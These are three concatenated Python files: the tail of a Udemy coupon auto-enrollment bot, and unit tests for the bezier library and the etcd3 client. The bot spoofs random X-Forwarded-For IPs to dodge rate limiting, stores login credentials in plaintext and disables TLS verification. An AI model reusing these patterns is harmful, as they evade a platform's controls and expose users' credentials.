"x-forwarded-for": str(
".".join(map(str, (random.randint(0, 255) for _ in range(4))))
),
"x-udemy-authorization": "Bearer " + r.cookies["access_token"],
"content-type": "application/json;charset=UTF-8",
"origin": "https://www.udemy.com",
"referer": "https://www.udemy.com/",
"dnt": "1",
}
s = requests.session()
s.cookies.update(cookies)
s.headers.update(head)
s.keep_alive = False
r = s.get(
"https://www.udemy.com/api-2.0/contexts/me/?me=True&Config=True"
).json()
currency = r["Config"]["price_country"]["currency"]
user = r["me"]["display_name"]
settings["email"], settings["password"] = email, password
save_settings()
return head, user, currency, s, ""
else:
soup = bs(r.content, "html5lib")
txt = soup.find(
"div", class_="alert alert-danger js-error-alert"
).text.strip()
if txt[0] == "Y":
return "", "", "", "", "Too many logins per hour try later"
elif txt[0] == "T":
return "", "", "", "", "Email or password incorrect"
else:
return "", "", "", "", txt
return (
"",
"",
"",
"",
"Cloudflare is blocking your requests try again after an hour",
)
def title_in_exclusion(title, t_x):
title_words = title.casefold().split()
for word in title_words:
word = word.casefold()
if word in t_x:
return True
return False
# -----------------
def free_checkout(coupon, courseid):
payload = (
'{"checkout_environment":"Marketplace","checkout_event":"Submit","shopping_info":{"items":[{"discountInfo":{"code":"'
+ coupon
+ '"},"buyable":{"type":"course","id":'
+ str(courseid)
+ ',"context":{}},"price":{"amount":0,"currency":"'
+ currency
+ '"}}]},"payment_info":{"payment_vendor":"Free","payment_method":"free-method"}}'
)
r = s.post(
"https://www.udemy.com/payment/checkout-submit/",
data=payload,
verify=False,
)
return r.json()
def free_enroll(courseid):
s.get("https://www.udemy.com/course/subscribe/?courseId=" + str(courseid))
r = s.get(
"https://www.udemy.com/api-2.0/users/me/subscribed-courses/"
+ str(courseid)
+ "/?fields%5Bcourse%5D=%40default%2Cbuyable_object_type%2Cprimary_subcategory%2Cis_private"
)
return r.json()
# -----------------
def auto(list_st):
se_c, ae_c, e_c, ex_c, as_c = 0, 0, 0, 0, 0
if settings["save_txt"]:
if not os.path.exists("Courses/"):
os.makedirs("Courses/")
txt_file = open(f"Courses/" + time.strftime("%Y-%m-%d--%H-%M"), "w")
for index, combo in enumerate(list_st):
tl = combo.split("|:|")
print(fy + str(index) + " " + tl[0], end=" ")
link = tl[1]
print(fb + link)
course_id = get_course_id(link)
if course_id:
coupon_id = get_course_coupon(link)
cat, lang, avg_rating, instructor = affiliate_api(course_id)
purchased, amount = course_landing_api(course_id)
if (
instructor in instructor_exclude
or title_in_exclusion(tl[0], title_exclude)
or cat not in categories
or lang not in languages
or avg_rating < min_rating
):
if instructor in instructor_exclude:
print(flb + f"Instructor excluded: {instructor}")
ex_c += 1
elif title_in_exclusion(tl[0], title_exclude):
print(flb + f"Instructor excluded: {instructor}")
elif cat not in categories:
print(flb + f"Category excluded: {cat}")
elif lang not in languages:
print(flb + f"Languages excluded: {lang}")
elif avg_rating < min_rating:
print(flb + f"Poor rating: {avg_rating}")
print()
ex_c += 1
else:
if not purchased:
if coupon_id:
slp = ""
js = free_checkout(coupon_id, course_id)
try:
if js["status"] == "succeeded":
print(fg + "Successfully Enrolled\n")
se_c += 1
as_c += amount
if settings["save_txt"]:
txt_file.write(combo + "\n")
txt_file.flush()
os.fsync(txt_file.fileno())
elif js["status"] == "failed":
# print(js)
print(fr + "Coupon Expired\n")
e_c += 1
except:
try:
msg = js["detail"]
print(fr + msg)
print()
slp = int(re.search(r"\d+", msg).group(0))
except:
# print(js)
print(fr + "Expired Coupon\n")
e_c += 1
if slp != "":
slp += 5
print(
fr
+ ">>> Pausing execution of script for "
+ str(slp)
+ " seconds\n",
)
time.sleep(slp)
else:
time.sleep(4)
elif not coupon_id:
js = free_enroll(course_id)
try:
if js["_class"] == "course":
print(fg + "Successfully Subscribed\n")
se_c += 1
as_c += amount
if settings["save_txt"]:
txt_file.write(combo + "\n")
txt_file.flush()
os.fsync(txt_file.fileno())
except:
print(fr + "COUPON MIGHT HAVE EXPIRED\n")
e_c += 1
elif purchased:
print(flb + purchased)
print()
ae_c += 1
elif not course_id:
print(fr + ".Course Expired.\n")
e_c += 1
# main_window["pout"].update(index + 1)
print(f"Successfully Enrolled: {se_c}")
print(f"Already Enrolled: {ae_c}")
print(f"Amount Saved: ${round(as_c,2)}")
print(f"Expired Courses: {e_c}")
print(f"Excluded Courses: {ex_c}")
def random_color():
col = ["green", "yellow", "white"]
return random.choice(col)
##########################################
def main1():
try:
links_ls = []
for index in funcs:
funcs[index].start()
time.sleep(0.09)
for t in funcs:
funcs[t].join()
time.sleep(1)
for link_list in [
"du_links",
"uf_links",
"tb_links",
"rd_links",
"cv_links",
"idc_links",
"en_links",
]:
try:
links_ls += eval(link_list)
except:
pass
auto(remove_duplicates(links_ls))
except:
e = traceback.format_exc()
print(e)
settings, instructor_exclude, title_exclude = load_settings()
############## MAIN ############# MAIN############## MAIN ############# MAIN ############## MAIN ############# MAIN ###########
txt = True
while txt:
if settings["email"] or settings["password"]:
email, password = settings["email"], settings["password"]
else:
email = input("Email: ")
password = input("Password: ")
print(fb + "Trying to login")
head, user, currency, s, txt = check_login(email, password)
if txt:
print(fr + txt)
print(fg + f"Logged in as {user}")
try:
update_available()
except:
pass
all_functions = create_scrape_obj()
funcs = {}
sites = []
categories = []
languages = []
instructor_exclude = settings["instructor_exclude"]
title_exclude = settings["title_exclude"]
min_rating = settings["min_rating"]
user_dumb = True
for name in settings["sites"]:
if settings["sites"][name]:
funcs[name] = all_functions[name]
sites.append(name)
user_dumb = False
for cat in settings["categories"]:
if settings["categories"][cat]:
categories.append(cat)
for lang in settings["languages"]:
if settings["languages"][lang]:
languages.append(lang)
if user_dumb:
print(bw + fr + " No sites selected ")
if not user_dumb:
tm = threading.Thread(target=main1, daemon=True)
tm.start()
tm.join()
|
test__triangle_intersection.py
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import unittest
from tests import utils as base_utils
from tests.unit import utils
from tests.unit.hazmat import test_triangle_intersection
@utils.needs_speedup
class Test_speedup_newton_refine(
test_triangle_intersection.Test_newton_refine
):
@staticmethod
def _call_function_under_test(nodes, degree, x_val, y_val, s, t):
from bezier import _speedup
return _speedup.newton_refine_triangle(
nodes, degree, x_val, y_val, s, t
)
@utils.needs_speedup
class Test_speedup_locate_point(test_triangle_intersection.Test_locate_point):
@staticmethod
def _call_function_under_test(nodes, degree, x_val, y_val):
from bezier import _speedup
return _speedup.locate_point_triangle(nodes, degree, x_val, y_val)
@utils.needs_speedup
class Test_speedup_geometric_intersect(
test_triangle_intersection.Test_geometric_intersect
):
BAD_BOUNDARY_ARGS = ("Unexpected number of edges",)
BAD_BOUNDARY_TYPE = RuntimeError
BAD_BOUNDARY_INCREASE_ULPS = True
@staticmethod
def _call_function_under_test(nodes1, degree1, nodes2, degree2, **kwargs):
from bezier import _speedup
return _speedup.triangle_intersections(
nodes1, degree1, nodes2, degree2, **kwargs
)
def test_two_curved_polygons(self):
# Make sure there is enough space so that no resize is needed.
sizes = triangle_workspace_sizes()
segment_ends_size, segments_size = sizes
self.assertGreaterEqual(segment_ends_size, 2)
self.assertGreaterEqual(segments_size, 6)
super_ = super(Test_speedup_geometric_intersect, self)
super_.test_two_curved_polygons()
# Make sure the workspace was **not** resized.
self.assertEqual(triangle_workspace_sizes(), sizes)
def test_resize_both(self):
reset_triangle_workspaces(segment_ends_size=1, segments_size=1)
super_ = super(Test_speedup_geometric_intersect, self)
super_.test_two_curved_polygons()
# Make sure the sizes were resized from (1, 1).
self.assertEqual(triangle_workspace_sizes(), (2, 6))
def test_insufficient_segment_ends(self):
from bezier import _speedup
reset_triangle_workspaces(segment_ends_size=1)
sizes = triangle_workspace_sizes()
with self.assertRaises(ValueError) as exc_info:
self._two_curved_polygons(resizes_allowed=0)
exc_args = exc_info.exception.args
template = _speedup.SEGMENT_ENDS_TOO_SMALL
self.assertEqual(exc_args, (template.format(2, 1),))
# Make sure the workspace was **not** resized.
self.assertEqual(triangle_workspace_sizes(), sizes)
def test_insufficient_segments(self):
from bezier import _speedup
reset_triangle_workspaces(segment_ends_size=2, segments_size=2)
sizes = triangle_workspace_sizes()
with self.assertRaises(ValueError) as exc_info:
self._two_curved_polygons(resizes_allowed=0)
exc_args = exc_info.exception.args
template = _speedup.SEGMENTS_TOO_SMALL
self.assertEqual(exc_args, (template.format(6, 2),))
# Make sure the workspace was **not** resized.
self.assertEqual(triangle_workspace_sizes(), sizes)
@utils.needs_speedup
class Test_speedup__type_info(unittest.TestCase):
@staticmethod
def _call_function_under_test():
from bezier import _speedup
return _speedup._type_info()
def test_it(self):
result = self._call_function_under_test()
is_native, item_size, dtype_num, size_of_struct = result
self.assertTrue(is_native)
self.assertEqual(dtype_num, 20)
if base_utils.IS_64_BIT or base_utils.IS_WINDOWS:
self.assertEqual(item_size, 24)
self.assertEqual(size_of_struct, 24)
else: # pragma: NO COVER
self.assertEqual(item_size, 20)
self.assertEqual(size_of_struct, 20)
@utils.needs_speedup
class Test_reset_triangle_workspaces(unittest.TestCase):
@staticmethod
def _call_function_under_test(**kwargs):
return reset_triangle_workspaces(**kwargs)
def test_it(self):
return_value = self._call_function_under_test(
segment_ends_size=1, segments_size=2
)
self.assertIsNone(return_value)
self.assertEqual(triangle_workspace_sizes(), (1, 2))
@unittest.expectedFailure
def test_threadsafe(self):
sizes_main = (4, 3)
self._call_function_under_test(
segment_ends_size=sizes_main[0], segments_size=sizes_main[1]
)
worker = WorkspaceThreadedAccess()
self.assertIsNone(worker.sizes1)
self.assertIsNone(worker.sizes2)
sizes1 = (1, 3)
sizes2 = (2, 2)
thread1 = threading.Thread(target=worker.task1, args=(sizes1,))
thread2 = threading.Thread(target=worker.task2, args=(sizes2,))
thread1.start()
thread2.start()
thread1.join()
thread2.join()
# This check demonstrates the **broken-ness** of the implementation.
# The sizes for each thread should be the sizes actually **set** in
# the given thread and the workspace in the main thread should be
# unchanged (i.e. should have ``sizes_main``). What we'll actually
# observe is ``(sizes2, sizes1, sizes2)``.
expected = (sizes1, sizes2, sizes_main)
actual = (worker.sizes1, worker.sizes2, triangle_workspace_sizes())
self.assertEqual(actual, expected)
@utils.needs_speedup
class Test_triangle_workspace_sizes(unittest.TestCase):
@staticmethod
def _call_function_under_test():
return triangle_workspace_sizes()
def test_it(self):
reset_triangle_workspaces(segment_ends_size=3, segments_size=5)
self.assertEqual(self._call_function_under_test(), (3, 5))
reset_triangle_workspaces(segment_ends_size=1)
self.assertEqual(self._call_function_under_test(), (1, 5))
reset_triangle_workspaces(segments_size=2)
self.assertEqual(self._call_function_under_test(), (1, 2))
def reset_triangle_workspaces(**kwargs):
from bezier import _speedup
return _speedup.reset_triangle_workspaces(**kwargs)
def triangle_workspace_sizes():
from bezier import _speedup
return _speedup.triangle_workspace_sizes()
class WorkspaceThreadedAccess:
def __init__(self):
self.barrier1 = threading.Event()
self.barrier2 = threading.Event()
self.barrier3 = threading.Event()
self.sizes1 = None
self.sizes2 = None
def event1(self, sizes):
# NOTE: There is no need to ``wait`` since this is the first event.
reset_triangle_workspaces(
segment_ends_size=sizes[0], segments_size=sizes[1]
)
self.barrier1.set()
def event2(self):
self.barrier1.wait()
result = triangle_workspace_sizes()
self.barrier2.set()
return result
def event3(self, sizes):
self.barrier2.wait()
reset_triangle_workspaces(
segment_ends_size=sizes[0], segments_size=sizes[1]
)
self.barrier3.set()
def event4(self):
self.barrier3.wait()
# NOTE: There is no barrier to ``set`` since this is the last event.
return triangle_workspace_sizes()
def task1(self, sizes):
self.event1(sizes)
self.sizes1 = self.event4()
def task2(self, sizes):
self.sizes2 = self.event2()
self.event3(sizes)
|
test_etcd3.py
|
"""
Tests for `etcd3` module.
----------------------------------
"""
import base64
import json
import os
import subprocess
import tempfile
import threading
import time
import grpc
from hypothesis import given, settings
from hypothesis.strategies import characters
import mock
import pytest
import six
from six.moves.urllib.parse import urlparse
from tenacity import retry, stop_after_attempt, wait_fixed
import etcd3
import etcd3.etcdrpc as etcdrpc
import etcd3.exceptions
import etcd3.utils as utils
from etcd3.client import EtcdTokenCallCredentials
etcd_version = os.environ.get('TEST_ETCD_VERSION', 'v3.2.8')
os.environ['ETCDCTL_API'] = '3'
if six.PY2:
int_types = (int, long)
else:
int_types = (int,)
# Don't set any deadline in Hypothesis
settings.register_profile("default", deadline=None)
settings.load_profile("default")
def etcdctl(*args):
endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
if endpoint:
args = ['--endpoints', endpoint] + list(args)
args = ['etcdctl', '-w', 'json'] + list(args)
print(" ".join(args))
output = subprocess.check_output(args)
return json.loads(output.decode('utf-8'))
# def etcdctl2(*args):
# # endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
# # if endpoint:
# # args = ['--endpoints', endpoint] + list(args)
# # args = ['echo', 'pwd', '|', 'etcdctl', '-w', 'json'] + list(args)
# # print(" ".join(args))
# output = subprocess.check_output("echo pwd | ./etcdctl user add root")
# return json.loads(output.decode('utf-8'))
class TestEtcd3(object):
class MockedException(grpc.RpcError):
def __init__(self, code):
self._code = code
def code(self):
return self._code
@pytest.fixture
def etcd(self):
endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
timeout = 5
if endpoint:
url = urlparse(endpoint)
with etcd3.client(host=url.hostname,
port=url.port,
timeout=timeout) as client:
yield client
else:
with etcd3.client() as client:
yield client
@retry(wait=wait_fixed(2), stop=stop_after_attempt(3))
def delete_keys_definitely():
# clean up after fixture goes out of scope
etcdctl('del', '--prefix', '/')
out = etcdctl('get', '--prefix', '/')
assert 'kvs' not in out
delete_keys_definitely()
def test_get_unknown_key(self, etcd):
value, meta = etcd.get('probably-invalid-key')
assert value is None
assert meta is None
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_get_key(self, etcd, string):
etcdctl('put', '/doot/a_key', string)
returned, _ = etcd.get('/doot/a_key')
assert returned == string.encode('utf-8')
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_get_random_key(self, etcd, string):
etcdctl('put', '/doot/' + string, 'dootdoot')
returned, _ = etcd.get('/doot/' + string)
assert returned == b'dootdoot'
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_get_have_cluster_revision(self, etcd, string):
etcdctl('put', '/doot/' + string, 'dootdoot')
_, md = etcd.get('/doot/' + string)
assert md.response_header.revision > 0
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_put_key(self, etcd, string):
etcd.put('/doot/put_1', string)
out = etcdctl('get', '/doot/put_1')
assert base64.b64decode(out['kvs'][0]['value']) == \
string.encode('utf-8')
def test_delete_key(self, etcd):
etcdctl('put', '/doot/delete_this', 'delete pls')
v, _ = etcd.get('/doot/delete_this')
assert v == b'delete pls'
deleted = etcd.delete('/doot/delete_this')
assert deleted is True
deleted = etcd.delete('/doot/delete_this')
assert deleted is False
deleted = etcd.delete('/doot/not_here_dude')
assert deleted is False
v, _ = etcd.get('/doot/delete_this')
assert v is None
def test_delete_keys_with_prefix(self, etcd):
etcdctl('put', '/foo/1', 'bar')
etcdctl('put', '/foo/2', 'baz')
v, _ = etcd.get('/foo/1')
assert v == b'bar'
v, _ = etcd.get('/foo/2')
assert v == b'baz'
response = etcd.delete_prefix('/foo')
assert response.deleted == 2
v, _ = etcd.get('/foo/1')
assert v is None
v, _ = etcd.get('/foo/2')
assert v is None
def test_watch_key(self, etcd):
def update_etcd(v):
etcdctl('put', '/doot/watch', v)
out = etcdctl('get', '/doot/watch')
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def update_key():
# sleep to make watch can get the event
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
update_etcd('2')
time.sleep(1)
update_etcd('3')
time.sleep(1)
t = threading.Thread(name="update_key", target=update_key)
t.start()
change_count = 0
events_iterator, cancel = etcd.watch(b'/doot/watch')
for event in events_iterator:
assert event.key == b'/doot/watch'
assert event.value == \
utils.to_bytes(str(change_count))
# if cancel worked, we should not receive event 3
assert event.value != utils.to_bytes('3')
change_count += 1
if change_count > 2:
# if cancel not work, we will block in this for-loop forever
cancel()
t.join()
def test_watch_key_with_revision_compacted(self, etcd):
etcdctl('put', '/random', '1') # Some data to compact
def update_etcd(v):
etcdctl('put', '/watchcompation', v)
out = etcdctl('get', '/watchcompation')
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def update_key():
# sleep to make watch can get the event
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
update_etcd('2')
time.sleep(1)
update_etcd('3')
time.sleep(1)
t = threading.Thread(name="update_key", target=update_key)
t.start()
def watch_compacted_revision_test():
events_iterator, cancel = etcd.watch(
b'/watchcompation', start_revision=1)
error_raised = False
compacted_revision = 0
try:
next(events_iterator)
except Exception as err:
error_raised = True
assert isinstance(err, etcd3.exceptions.RevisionCompactedError)
compacted_revision = err.compacted_revision
assert error_raised is True
assert compacted_revision == 2
change_count = 0
events_iterator, cancel = etcd.watch(
b'/watchcompation', start_revision=compacted_revision)
for event in events_iterator:
assert event.key == b'/watchcompation'
assert event.value == \
utils.to_bytes(str(change_count))
# if cancel worked, we should not receive event 3
assert event.value != utils.to_bytes('3')
change_count += 1
if change_count > 2:
cancel()
# Compact etcd and test watcher
etcd.compact(2)
watch_compacted_revision_test()
t.join()
def test_watch_exception_during_watch(self, etcd):
def pass_exception_to_callback(callback):
time.sleep(1)
callback(self.MockedException(grpc.StatusCode.UNAVAILABLE))
def add_callback_mock(*args, **kwargs):
callback = args[1]
t = threading.Thread(name="pass_exception_to_callback",
target=pass_exception_to_callback,
args=[callback])
t.start()
return 1
watcher_mock = mock.MagicMock()
watcher_mock.add_callback = add_callback_mock
etcd.watcher = watcher_mock
events_iterator, cancel = etcd.watch('foo')
with pytest.raises(etcd3.exceptions.ConnectionFailedError):
for _ in events_iterator:
pass
def test_watch_timeout_on_establishment(self, etcd):
foo_etcd = etcd3.client(timeout=3)
def slow_watch_mock(*args, **kwargs):
time.sleep(4)
foo_etcd.watcher._watch_stub.Watch = slow_watch_mock # noqa
with pytest.raises(etcd3.exceptions.WatchTimedOut):
foo_etcd.watch('foo')
def test_watch_prefix(self, etcd):
def update_etcd(v):
etcdctl('put', '/doot/watch/prefix/' + v, v)
out = etcdctl('get', '/doot/watch/prefix/' + v)
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def update_key():
# sleep to make watch can get the event
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
update_etcd('2')
time.sleep(1)
update_etcd('3')
time.sleep(1)
t = threading.Thread(name="update_key_prefix", target=update_key)
t.start()
change_count = 0
events_iterator, cancel = etcd.watch_prefix('/doot/watch/prefix/')
for event in events_iterator:
assert event.key == \
utils.to_bytes('/doot/watch/prefix/{}'.format(change_count))
assert event.value == \
utils.to_bytes(str(change_count))
# if cancel worked, we should not receive event 3
assert event.value != utils.to_bytes('3')
change_count += 1
if change_count > 2:
# if cancel not work, we will block in this for-loop forever
cancel()
t.join()
def test_sequential_watch_prefix_once(self, etcd):
try:
etcd.watch_prefix_once('/doot/', 1)
except etcd3.exceptions.WatchTimedOut:
pass
try:
etcd.watch_prefix_once('/doot/', 1)
except etcd3.exceptions.WatchTimedOut:
pass
try:
etcd.watch_prefix_once('/doot/', 1)
except etcd3.exceptions.WatchTimedOut:
pass
def test_transaction_success(self, etcd):
etcdctl('put', '/doot/txn', 'dootdoot')
etcd.transaction(
compare=[etcd.transactions.value('/doot/txn') == 'dootdoot'],
success=[etcd.transactions.put('/doot/txn', 'success')],
failure=[etcd.transactions.put('/doot/txn', 'failure')]
)
out = etcdctl('get', '/doot/txn')
assert base64.b64decode(out['kvs'][0]['value']) == b'success'
def test_transaction_failure(self, etcd):
etcdctl('put', '/doot/txn', 'notdootdoot')
etcd.transaction(
compare=[etcd.transactions.value('/doot/txn') == 'dootdoot'],
success=[etcd.transactions.put('/doot/txn', 'success')],
failure=[etcd.transactions.put('/doot/txn', 'failure')]
)
out = etcdctl('get', '/doot/txn')
assert base64.b64decode(out['kvs'][0]['value']) == b'failure'
def test_ops_to_requests(self, etcd):
with pytest.raises(Exception):
etcd._ops_to_requests(['not_transaction_type'])
with pytest.raises(TypeError):
etcd._ops_to_requests(0)
def test_replace_success(self, etcd):
etcd.put('/doot/thing', 'toot')
status = etcd.replace('/doot/thing', 'toot', 'doot')
v, _ = etcd.get('/doot/thing')
assert v == b'doot'
assert status is True
def test_replace_fail(self, etcd):
etcd.put('/doot/thing', 'boot')
status = etcd.replace('/doot/thing', 'toot', 'doot')
v, _ = etcd.get('/doot/thing')
assert v == b'boot'
assert status is False
def test_get_prefix(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am a range')
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am a not range')
values = list(etcd.get_prefix('/doot/range'))
assert len(values) == 20
for value, _ in values:
assert value == b'i am a range'
def test_all_not_found_error(self, etcd):
result = list(etcd.get_all())
assert not result
def test_range_not_found_error(self, etcd):
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am a not range')
result = list(etcd.get_prefix('/doot/range'))
assert not result
def test_get_all(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am in all')
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am in all')
values = list(etcd.get_all())
assert len(values) == 25
for value, _ in values:
assert value == b'i am in all'
def test_sort_order(self, etcd):
def remove_prefix(string, prefix):
return string[len(prefix):]
initial_keys = 'abcde'
initial_values = 'qwert'
for k, v in zip(initial_keys, initial_values):
etcdctl('put', '/doot/{}'.format(k), v)
keys = ''
for value, meta in etcd.get_prefix('/doot', sort_order='ascend'):
keys += remove_prefix(meta.key.decode('utf-8'), '/doot/')
assert keys == initial_keys
reverse_keys = ''
for value, meta in etcd.get_prefix('/doot', sort_order='descend'):
reverse_keys += remove_prefix(meta.key.decode('utf-8'), '/doot/')
assert reverse_keys == ''.join(reversed(initial_keys))
def test_lease_grant(self, etcd):
lease = etcd.lease(1)
assert isinstance(lease.ttl, int_types)
assert isinstance(lease.id, int_types)
def test_lease_revoke(self, etcd):
lease = etcd.lease(1)
lease.revoke()
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
reason="requires etcd v3.1 or higher")
def test_lease_keys_empty(self, etcd):
lease = etcd.lease(1)
assert lease.keys == []
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
reason="requires etcd v3.1 or higher")
def test_lease_single_key(self, etcd):
lease = etcd.lease(1)
etcd.put('/doot/lease_test', 'this is a lease', lease=lease)
assert lease.keys == [b'/doot/lease_test']
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
reason="requires etcd v3.1 or higher")
def test_lease_expire(self, etcd):
key = '/doot/lease_test_expire'
lease = etcd.lease(1)
etcd.put(key, 'this is a lease', lease=lease)
assert lease.keys == [utils.to_bytes(key)]
v, _ = etcd.get(key)
assert v == b'this is a lease'
assert lease.remaining_ttl <= lease.granted_ttl
# wait for the lease to expire
time.sleep(lease.granted_ttl + 2)
v, _ = etcd.get(key)
assert v is None
def test_member_list_single(self, etcd):
# if tests are run against an etcd cluster rather than a single node,
# this test will need to be changed
assert len(list(etcd.members)) == 1
for member in etcd.members:
assert member.name == 'default'
for peer_url in member.peer_urls:
assert peer_url.startswith('http://')
for client_url in member.client_urls:
assert client_url.startswith('http://')
assert isinstance(member.id, int_types) is True
def test_lock_acquire(self, etcd):
lock = etcd.lock('lock-1', ttl=10)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
assert lock.acquire(timeout=0) is False
assert lock.acquire(timeout=1) is False
def test_lock_release(self, etcd):
lock = etcd.lock('lock-2', ttl=10)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
assert lock.release() is True
v, _ = etcd.get(lock.key)
assert v is None
assert lock.acquire() is True
assert lock.release() is True
assert lock.acquire(timeout=None) is True
def test_lock_expire(self, etcd):
lock = etcd.lock('lock-3', ttl=3)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
# wait for the lease to expire
time.sleep(9)
v, _ = etcd.get(lock.key)
assert v is None
def test_lock_refresh(self, etcd):
lock = etcd.lock('lock-4', ttl=3)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
# sleep for the same total time as test_lock_expire, but refresh each
# second
for _ in range(9):
time.sleep(1)
lock.refresh()
assert etcd.get(lock.key)[0] is not None
def test_lock_is_acquired(self, etcd):
lock1 = etcd.lock('lock-5', ttl=2)
assert lock1.is_acquired() is False
lock2 = etcd.lock('lock-5', ttl=2)
lock2.acquire()
assert lock2.is_acquired() is True
lock2.release()
lock3 = etcd.lock('lock-5', ttl=2)
lock3.acquire()
assert lock3.is_acquired() is True
assert lock2.is_acquired() is False
def test_lock_context_manager(self, etcd):
with etcd.lock('lock-6', ttl=2) as lock:
assert lock.is_acquired() is True
assert lock.is_acquired() is False
def test_lock_contended(self, etcd):
lock1 = etcd.lock('lock-7', ttl=2)
lock1.acquire()
lock2 = etcd.lock('lock-7', ttl=2)
lock2.acquire()
assert lock1.is_acquired() is False
assert lock2.is_acquired() is True
def test_lock_double_acquire_release(self, etcd):
lock = etcd.lock('lock-8', ttl=10)
assert lock.acquire(0) is True
assert lock.acquire(0) is False
assert lock.release() is True
def test_lock_acquire_none(self, etcd):
lock = etcd.lock('lock-9', ttl=10)
assert lock.acquire(None) is True
# This will succeed after 10 seconds since the TTL will expire and the
# lock is not refreshed
assert lock.acquire(None) is True
def test_internal_exception_on_internal_error(self, etcd):
exception = self.MockedException(grpc.StatusCode.INTERNAL)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(etcd3.exceptions.InternalServerError):
etcd.get("foo")
def test_connection_failure_exception_on_connection_failure(self, etcd):
exception = self.MockedException(grpc.StatusCode.UNAVAILABLE)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(etcd3.exceptions.ConnectionFailedError):
etcd.get("foo")
def test_connection_timeout_exception_on_connection_timeout(self, etcd):
exception = self.MockedException(grpc.StatusCode.DEADLINE_EXCEEDED)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(etcd3.exceptions.ConnectionTimeoutError):
etcd.get("foo")
def test_grpc_exception_on_unknown_code(self, etcd):
exception = self.MockedException(grpc.StatusCode.DATA_LOSS)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(grpc.RpcError):
etcd.get("foo")
def test_status_member(self, etcd):
status = etcd.status()
assert isinstance(status.leader, etcd3.members.Member) is True
assert status.leader.id in [m.id for m in etcd.members]
def test_hash(self, etcd):
assert isinstance(etcd.hash(), int)
def test_snapshot(self, etcd):
with tempfile.NamedTemporaryFile() as f:
etcd.snapshot(f)
f.flush()
etcdctl('snapshot', 'status', f.name)
class TestAlarms(object):
@pytest.fixture
def etcd(self):
etcd = etcd3.client()
yield etcd
etcd.disarm_alarm()
for m in etcd.members:
if m.active_alarms:
etcd.disarm_alarm(m.id)
def test_create_alarm_all_members(self, etcd):
alarms = etcd.create_alarm()
assert len(alarms) == 1
assert alarms[0].member_id == 0
assert alarms[0].alarm_type == etcdrpc.NOSPACE
def test_create_alarm_specific_member(self, etcd):
a_member = next(etcd.members)
alarms = etcd.create_alarm(member_id=a_member.id)
assert len(alarms) == 1
assert alarms[0].member_id == a_member.id
assert alarms[0].alarm_type == etcdrpc.NOSPACE
def test_list_alarms(self, etcd):
a_member = next(etcd.members)
etcd.create_alarm()
etcd.create_alarm(member_id=a_member.id)
possible_member_ids = [0, a_member.id]
alarms = list(etcd.list_alarms())
assert len(alarms) == 2
for alarm in alarms:
possible_member_ids.remove(alarm.member_id)
assert alarm.alarm_type == etcdrpc.NOSPACE
assert possible_member_ids == []
def test_disarm_alarm(self, etcd):
etcd.create_alarm()
assert len(list(etcd.list_alarms())) == 1
etcd.disarm_alarm()
assert len(list(etcd.list_alarms())) == 0
class TestUtils(object):
def test_increment_last_byte(self):
assert etcd3.utils.increment_last_byte(b'foo') == b'fop'
def test_to_bytes(self):
assert isinstance(etcd3.utils.to_bytes(b'doot'), bytes) is True
assert isinstance(etcd3.utils.to_bytes('doot'), bytes) is True
assert etcd3.utils.to_bytes(b'doot') == b'doot'
assert etcd3.utils.to_bytes('doot') == b'doot'
class TestEtcdTokenCallCredentials(object):
def test_token_callback(self):
e = EtcdTokenCallCredentials('foo')
callback = mock.MagicMock()
e(None, callback)
metadata = (('token', 'foo'),)
callback.assert_called_once_with(metadata, None)
class TestClient(object):
@pytest.fixture
def etcd(self):
yield etcd3.client()
def test_sort_target(self, etcd):
key = 'key'.encode('utf-8')
sort_target = {
None: etcdrpc.RangeRequest.KEY,
'key': etcdrpc.RangeRequest.KEY,
'version': etcdrpc.RangeRequest.VERSION,
'create': etcdrpc.RangeRequest.CREATE,
'mod': etcdrpc.RangeRequest.MOD,
'value': etcdrpc.RangeRequest.VALUE,
}
for input, expected in sort_target.items():
range_request = etcd._build_get_range_request(key,
sort_target=input)
assert range_request.sort_target == expected
with pytest.raises(ValueError):
etcd._build_get_range_request(key, sort_target='feelsbadman')
def test_sort_order(self, etcd):
key = 'key'.encode('utf-8')
sort_target = {
None: etcdrpc.RangeRequest.NONE,
